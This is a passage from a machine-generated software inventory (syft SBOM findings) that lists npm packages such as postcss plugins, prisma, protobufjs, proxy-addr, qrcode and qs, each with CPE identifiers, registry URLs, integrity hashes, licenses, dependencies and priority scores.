- cpe: cpe:2.3:a:postcss-load-config:postcss_load_config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_load_config:postcss-load-config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_load_config:postcss_load_config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-load:postcss-load-config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-load:postcss_load_config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_load:postcss-load-config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_load:postcss_load_config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss-load-config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss_load_config:6.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/postcss-load-config@6.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss-load-config/-/postcss-load-config-6.0.1.tgz
integrity: sha512-oPtTM4oerL+UXmx+93ytZVN82RrlY/wPUV8IeDxFrzIjXOLF1pN+EmKPLbubvKHT2HC20xXsCAH2Z+CKV6Oz/g==
dependencies:
lilconfig: ^3.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: a302d705f049e265
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss-nested 6.2.0'
title: postcss-nested 6.2.0
description: 'Package discovered: postcss-nested 6.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 16f11e75cb882477
name: postcss-nested
version: 6.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss-nested:postcss-nested:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-nested:postcss_nested:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_nested:postcss-nested:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_nested:postcss_nested:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss-nested:6.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss_nested:6.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/postcss-nested@6.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss-nested/-/postcss-nested-6.2.0.tgz
integrity: sha512-HQbt28KulC5AJzG+cZtj9kvKB93CFCdLvog1WFLf1D+xmMvPGlBstkpTEZfK5+AN9hfJocyBFCNiqyS48bpgzQ==
dependencies:
postcss-selector-parser: ^6.1.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 002cf57b0b0dcab6
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss-selector-parser 6.1.2'
title: postcss-selector-parser 6.1.2
description: 'Package discovered: postcss-selector-parser 6.1.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f7f4c134629f3b3a
name: postcss-selector-parser
version: 6.1.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss-selector-parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-selector-parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_selector_parser:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_selector_parser:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_selector:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_selector:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss-selector-parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss_selector_parser:6.1.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/postcss-selector-parser@6.1.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss-selector-parser/-/postcss-selector-parser-6.1.2.tgz
integrity: sha512-Q8qQfPiZ+THO/3ZrOrO0cJJKfpYCagtMUkXbnEfmgUjwXg6z/WBeOyS9APBBPCTSiDV+s4SwQGu8yFsiMRIudg==
dependencies:
cssesc: ^3.0.0
util-deprecate: ^1.0.2
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 738a4e319226bde2
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: postcss-value-parser 4.2.0'
title: postcss-value-parser 4.2.0
description: 'Package discovered: postcss-value-parser 4.2.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d70570520f43a33c
name: postcss-value-parser
version: 4.2.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:postcss-value-parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-value-parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_value_parser:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_value_parser:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss-value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_value:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss_value:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss-value-parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:postcss:postcss_value_parser:4.2.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/postcss-value-parser@4.2.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/postcss-value-parser/-/postcss-value-parser-4.2.0.tgz
integrity: sha512-1NNCs6uurfkVbeXG4S8JFT9t19m45ICnif8zWLd5oPSZ50QnwMfK+H3jv408d4jw/7Bttv5axS5IiHoLaVNHeQ==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f330341278522955
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: prisma 5.22.0'
title: prisma 5.22.0
description: 'Package discovered: prisma 5.22.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: f76e4353403c9c3d
name: prisma
version: 5.22.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:prisma:prisma:5.22.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/prisma@5.22.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz
integrity: sha512-vtpjW3XuYCSnMsNVBjLMNkTj6OZbudcPPTPYHqX0CJfpcdWciI1dM8uHETwmDxxiqEwCIE6WvXucWUetJgfu/A==
dependencies:
'@prisma/engines': 5.22.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 9fc67df1307075e9
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: process-nextick-args 2.0.1'
title: process-nextick-args 2.0.1
description: 'Package discovered: process-nextick-args 2.0.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: da765da41b164754
name: process-nextick-args
version: 2.0.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:process-nextick-args:process-nextick-args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process-nextick-args:process_nextick_args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process_nextick_args:process-nextick-args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process_nextick_args:process_nextick_args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process-nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process-nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process_nextick:process-nextick-args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process_nextick:process_nextick_args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process:process-nextick-args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:process:process_nextick_args:2.0.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/process-nextick-args@2.0.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz
integrity: sha512-3ouUOpQhtgrbOa17J7+uxOTpITYWaGP7/AhoR3+A+/1e9skrzelGi/dXzEYyvbxubEF6Wn2ypscTKiKJFFn1ag==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: b351d49072943449
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: prop-types 15.8.1'
title: prop-types 15.8.1
description: 'Package discovered: prop-types 15.8.1'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 2485766b0114da33
name: prop-types
version: 15.8.1
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:prop-types:prop-types:15.8.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:prop-types:prop_types:15.8.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:prop_types:prop-types:15.8.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:prop_types:prop_types:15.8.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:prop:prop-types:15.8.1:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:prop:prop_types:15.8.1:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/prop-types@15.8.1
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/prop-types/-/prop-types-15.8.1.tgz
integrity: sha512-oj87CgZICdulUohogVAR7AjlC0327U4el4L6eAvOqCeudMDVU0NThNaV+b9Df4dXgSP1gXMTnPdhfe/2qDH5cg==
dependencies:
loose-envify: ^1.4.0
object-assign: ^4.1.1
react-is: ^16.13.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: acadb8b8517c78d3
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: proto-list 1.2.4'
title: proto-list 1.2.4
description: 'Package discovered: proto-list 1.2.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 685c0e3e50c6553a
name: proto-list
version: 1.2.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: ISC
spdxExpression: ISC
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:proto-list:proto-list:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto-list:proto_list:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto_list:proto-list:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto_list:proto_list:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto:proto-list:1.2.4:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto:proto_list:1.2.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/proto-list@1.2.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz
integrity: sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 44c7a82b0c4aafcf
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: proto3-json-serializer 2.0.2'
title: proto3-json-serializer 2.0.2
description: 'Package discovered: proto3-json-serializer 2.0.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 5add12638aea166c
name: proto3-json-serializer
version: 2.0.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: Apache-2.0
spdxExpression: Apache-2.0
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:proto3-json-serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3-json-serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3_json_serializer:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3_json_serializer:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3-json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3-json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3_json:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3_json:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3:proto3-json-serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proto3:proto3_json_serializer:2.0.2:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/proto3-json-serializer@2.0.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/proto3-json-serializer/-/proto3-json-serializer-2.0.2.tgz
integrity: sha512-SAzp/O4Yh02jGdRc+uIrGoe87dkN/XtwxfZ4ZyafJHymd79ozp5VG5nyZ7ygqPM5+cpLDjjGnYFUkngonyDPOQ==
dependencies:
protobufjs: ^7.2.5
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: f337eadf0901e415
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: protobufjs 7.5.6'
title: protobufjs 7.5.6
description: 'Package discovered: protobufjs 7.5.6'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: a5b5323abf9aae9f
name: protobufjs
version: 7.5.6
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:protobufjs_project:protobufjs:7.5.6:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/protobufjs@7.5.6
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.6.tgz
integrity: sha512-M71sTMB146U3u0di3yup8iM+zv8yPRNQVr1KK4tyBitl3qFvEGucq/rGDRShD2rsJhtN02RJaJ7j5X5hmy8SJg==
dependencies:
'@protobufjs/aspromise': ^1.1.2
'@protobufjs/base64': ^1.1.2
'@protobufjs/codegen': ^2.0.5
'@protobufjs/eventemitter': ^1.1.0
'@protobufjs/fetch': ^1.1.0
'@protobufjs/float': ^1.0.2
'@protobufjs/inquire': ^1.1.1
'@protobufjs/path': ^1.1.2
'@protobufjs/pool': ^1.1.0
'@protobufjs/utf8': ^1.1.1
'@types/node': '>=13.7.0'
long: ^5.0.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: d4455e8054d4e780
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: proxy-addr 2.0.7'
title: proxy-addr 2.0.7
description: 'Package discovered: proxy-addr 2.0.7'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: ce10aea6db36304a
name: proxy-addr
version: 2.0.7
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:proxy-addr:proxy-addr:2.0.7:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy-addr:proxy_addr:2.0.7:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy_addr:proxy-addr:2.0.7:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy_addr:proxy_addr:2.0.7:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy:proxy-addr:2.0.7:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy:proxy_addr:2.0.7:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/proxy-addr@2.0.7
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/proxy-addr/-/proxy-addr-2.0.7.tgz
integrity: sha512-llQsMLSUDUPT44jdrU/O37qlnifitDP+ZwrmmZcoSKyLKvtZxpyV0n2/bD/N4tBAAZ/gJEdZU7KMraoK1+XYAg==
dependencies:
forwarded: 0.2.0
ipaddr.js: 1.9.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 4788b4003cbe678a
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: proxy-from-env 2.1.0'
title: proxy-from-env 2.1.0
description: 'Package discovered: proxy-from-env 2.1.0'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: d0670890e90b35a8
name: proxy-from-env
version: 2.1.0
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:proxy-from-env:proxy-from-env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy-from-env:proxy_from_env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy_from_env:proxy-from-env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy_from_env:proxy_from_env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy-from:proxy-from-env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy-from:proxy_from_env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy_from:proxy-from-env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy_from:proxy_from_env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy:proxy-from-env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
- cpe: cpe:2.3:a:proxy:proxy_from_env:2.1.0:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/proxy-from-env@2.1.0
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-2.1.0.tgz
integrity: sha512-cJ+oHTW1VAEa8cJslgmUZrc+sjRKgAKl3Zyse6+PV38hZe/V6Z14TbCuXcan9F9ghlz4QrFr2c92TNF82UkYHA==
dependencies: null
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: 6d2187ed4d7bb00d
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: qrcode 1.5.4'
title: qrcode 1.5.4
description: 'Package discovered: qrcode 1.5.4'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: 9616afcfad81bbcd
name: qrcode
version: 1.5.4
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: MIT
spdxExpression: MIT
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:qrcode:qrcode:1.5.4:*:*:*:*:*:*:*
source: syft-generated
purl: pkg:npm/qrcode@1.5.4
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/qrcode/-/qrcode-1.5.4.tgz
integrity: sha512-1ca71Zgiu6ORjHqFBDpnSMTR2ReToX4l1Au1VFLyVeBTFavzQnv5JxMFr3ukHVKpSrSA2MCk0lNJSykjUfz7Zg==
dependencies:
dijkstrajs: ^1.0.1
pngjs: ^5.0.0
yargs: ^15.3.1
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
pciDss4_0:
- *id013
- *id014
mitreAttack:
- *id015
priority:
priority: 3.333333333333333
epss: null
epss_percentile: null
is_kev: false
kev_due_date: null
components:
severity_score: 1
epss_multiplier: 1.0
kev_multiplier: 1.0
reachability_multiplier: 1.0
- schemaVersion: 1.2.0
id: cd93e60074e9daeb
ruleId: SBOM.PACKAGE
severity: INFO
tool:
name: syft
version: unknown
location:
path: /package-lock.json
startLine: 0
message: 'Package discovered: qs 6.14.2'
title: qs 6.14.2
description: 'Package discovered: qs 6.14.2'
remediation: Track and scan dependencies.
references: []
tags:
- sbom
- package
raw:
id: baa7b01807110a4c
name: qs
version: 6.14.2
type: npm
foundBy: javascript-lock-cataloger
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
licenses:
- value: BSD-3-Clause
spdxExpression: BSD-3-Clause
type: declared
urls: []
locations:
- path: /package-lock.json
accessPath: /package-lock.json
annotations:
evidence: primary
language: javascript
cpes:
- cpe: cpe:2.3:a:qs_project:qs:6.14.2:*:*:*:*:node.js:*:*
source: nvd-cpe-dictionary
purl: pkg:npm/qs@6.14.2
metadataType: javascript-npm-package-lock-entry
metadata:
resolved: https://registry.npmjs.org/qs/-/qs-6.14.2.tgz
integrity: sha512-V/yCWTTF7VJ9hIh18Ugr2zhJMP01MY7c5kh4J870L7imm6/DIzBsNLTXzMwUA3yZ5b/KBqLx8Kp3uRvd7xSe3Q==
dependencies:
side-channel: ^1.1.0
compliance:
cisControlsV8_1: *id010
nistCsf2_0:
- *id011
- *id012
